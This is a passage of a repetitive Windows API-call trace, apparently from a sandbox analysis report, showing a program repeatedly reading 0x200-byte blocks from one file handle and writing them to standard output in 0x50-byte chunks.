(hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.181] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.181] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.181] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.181] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.182] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.182] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.184] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.184] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.185] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.185] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.186] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.186] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.187] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.187] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.188] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.188] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.189] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.189] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, 